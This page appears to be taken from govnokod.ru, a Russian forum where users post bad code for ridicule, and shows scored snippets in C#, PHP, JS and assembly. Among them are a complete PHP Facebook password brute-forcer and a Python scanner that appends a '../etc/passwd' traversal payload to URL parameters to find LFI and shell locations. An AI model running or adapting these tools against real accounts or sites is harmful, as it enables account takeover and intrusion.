- 1
- 2
- 3
- 4
- 5
- 6
uint i;
…
if (i.ToString().Length == 1)
{
...
}
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
−14
uint i;
…
if (i.ToString().Length == 1)
{
...
}
Не сразу можно понять, что в этом коде просто-напросто выполняется проверка i < 10. Алгоритм достаточно прост: выполняется преобразование i в строку, после чего вычисляется ее длина. Если число больше 9, то его десятичная запись содержит больше одного символа. Отрицательные числа переменная типа uint содержать не может. Проверку проходят лишь числа от 0 до 9.
Алгоритм ресурсоемок, неочевиден и не поддается сопровождению даже теоретически.
взято с lurkmore.ru, там вообще много про "индусский код"
+27.8
function createErrorObj($strField, $bDisplay = 'false', $format = false, $strTitle = null) {
global $Error, $__error;
if (!$Error) {
ErrorsHandling::_create();
}
if ($bDisplay !== 'true') {
$bDisplay = 'false';
}
....
страшный для кого-то был $bDisplay
+72.8
mov ebx, eax
mov eax, ebx
Такое борландовский кодогенератор иногда выдаёт
+34.7
} else {
$json_array = array('error' => $this->log_error('busy', true));
}
} else {
$json_array = array('error' => $this->log_error('busy', true));
}
} else {
$json_array = array('error' => $this->log_error('busy', true));
}
} else {
$json_array = array('error' => $this->log_error('busy', true));
}
} else {
$json_array = array('error' => $this->log_error('bad_symbols', false));
}
} else {
$json_array = array('error' => $this->log_error('check_error', false));
// 'errorStr' => $this->validation->error_string
}
Кусок метода в контроллере регистрации пользователя на одном из наших проектов. Вверху хренова гора ифов а внизу во такое вот счастье. "Авторская" табуляция сохранена
+32
/**
* Сабж: Проверка формы
* Для каждого поля в форме было понаколбашено по отдельной(!) функции для проверки
* Но и это цветочки...
*/
// Поехали!(С)
// запуск проверки всех полей формы <- это древний комент
function checkAll()
{
var elements = new Array('avto', 'duration', 'start_adress', 'end_adress', 'orderer_name', 'orderer_phone', 'orderer_mail');
for (i = 0; i < 7; i++)
{
var curEl = document.getElementById(elements[i]);
curEl.focus(); // тут, suka, особенно жестоко!
curEl.blur(); //
}
var StatSum = "";
for (j = 0; j < 7; j++)
{
// в форме сделаны были ккрытые инпупуты, куда
// проверяющая функция писала 0 или 1 в зависимости от результата проверки
var curStat = document.getElementById(elements[j]+"Status");
if (curStat.value == "1")
{StatSum = StatSum + "1";}
if (curStat.value == "0" || curStat.value == "")
{StatSum = StatSum + "";}
}
// ну тут ваще пиздец)))
// семь нулей - это семь удачно проверенных полей формы
if (StatSum == "" || StatSum == "0000000")
{
// щёлкаем, suka, по самбмиту..
var btn = document.getElementById("submit");
btn.click();
}
return (false);
}
// занавес...
/************************************************************/
Блин, попёрло сейчас покурить свои извращения на JS двухлетней давности...
У меня истерика = )
+19.2
<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
−424
#!/usr/bin/python
#LinkScanSimple will take a list of sites and
#add an extension after the = then search the
#source for a match you choose.
#For an LFI scan I use "root:" but for a shell location
#I would choose the shell title (r57shell). For SQL
#you can choose a common sql error.
import sys, re, urllib2, sets, socket
socket.setdefaulttimeout(5)
#---------------------------------------------------------
#Edit what you want added to the address.
EXT = "../../../../../../../../../../../../etc/passwd"
#Edit what you want to search for.
MATCH = "root:"
#---------------------------------------------------------
def parse_urls(links):
urls = []
for link in links:
num = link.count("=")
if num > 0:
for x in xrange(num):
link = link.rsplit("=",x+1)[0]+"="
urls.append(link+EXT)
urls = list(sets.Set(urls))
return urls
def test(host):
print "[+] Testing:",host.replace(EXT,"")
try:
source = urllib2.urlopen(host).read()
if re.search(MATCH, source):
print "[+] Found:",host
else:
print "[-] Not Vuln."
except:
pass
print "\n\t d3hydr8[at]gmail[dot]com LinkScanSimple v1.0"
print "\t-------------------------------------------------\n"
if len(sys.argv) != 2:
print "Usage : ./linkscan.py <site_list>"
print "Ex: ./linkscan.py sites.txt\n"
sys.exit(1)
try:
sites = open(sys.argv[1], "r").readlines()
except(IOError):
print "Error: Check your site list path\n"
sys.exit(1)
print "[+] Loaded:",len(sites),"sites"
urls = parse_urls(sites)
print "[+] Links Found:",len(urls)
for url in urls:
try:
test(url.replace("\n",""))
except(KeyboardInterrupt):
pass
print "\n[-] Scan Complete\n"
+28
$query = "update users set password = '{$cnf['userpass']}', email = '{$cnf['useremail']}' where login = 'root'";
if (mysql_query($query, $link) === false) {
throw new Exception(mysql_error($link));
}
mysql_close($link);
удалить)
+16.1
<?php
$openchatdb=fopen("chat.db","a"); -имя базы
$chatnick=$_POST['chatnick'];
$chatmsg=$_POST['chatmsg'];
if(fwrite($openchatdb,date("d.m.Y|G:i:s ").$chatnick." ")) -формат даты
{
if(fwrite($openchatdb,$chatmsg.chr(10)))
{
echo "Сообщение отправлено<meta http-equiv='refresh' content='1;url=add.php'>"; -текст о успешной отправки сообщения
}
}
else
{
echo "Ошибка при отправлении сообщения,поставьте файлу chat.db правва 775"; -текст ошибки чата
}
fclose($openchatdb);
?>
+30.7
if (strlen(ini_get('safe_mode'))<1)
...
Система ProBid